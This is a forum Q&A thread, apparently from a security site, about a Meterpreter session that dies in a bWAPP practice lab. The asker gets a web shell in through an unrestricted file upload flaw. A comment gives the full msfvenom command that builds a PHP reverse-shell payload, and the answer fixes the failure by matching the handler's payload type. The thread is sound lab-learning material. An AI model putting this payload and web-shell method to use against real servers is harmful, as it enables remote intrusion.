Meterpreter Session died [Bwapp]

Question

I just set up a lab with bwapp and wanted to jump straight into webshell. I used Unrestricted file upload vuln --> uploaded my perfect shell created with msfvenom.

My only problem is that my session doesn't seem persistent as I'm getting Meterpreter session opened and then died.

For more context, bwapp is on a bridged network vbox and my kali is also bridged.

php/meterpreter_reverse_tcp etc etc.

Any ideas...

I need persistence (RCE)

Without wishing to sound like an arse, have you investigated the many links on Google that talk about this from a variety of sources? It could be any number of things varying from AV killing it, to bad exploit code. Could you add more contextual detail? — , Jul 29 '20 at 09:58
Yes I have gone through quite a bit of searching. I created a raw shell using msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=<4444t> -f raw > shelly.php I managed to upload the shell, launch multi/handler with LHOST on 4444 and then my session was created on path ("IP")/bwapp/upload/images/shelly.php but died as soon as the path resolved... it was almost immediate. — hx.m4v, Jul 29 '20 at 12:57

score 1 · Answer 1 · answered Jul 29 '20 at 14:07

1

I Found the issue here.

I was using msfvenom payload @ php/meterpreter_reverse_tcp but my handler was php/meterpreter/reverse_tcp when I changed it to match (php/meterpreter_reverse_tcp) exactly then my session was established.

answered Jul 29 '20 at 14:07

hx.m4v

21
4

1

Good work! Thanks for adding a solution too. – Jul 29 '20 at 15:52

Meterpreter Session died [Bwapp]

1 Answers1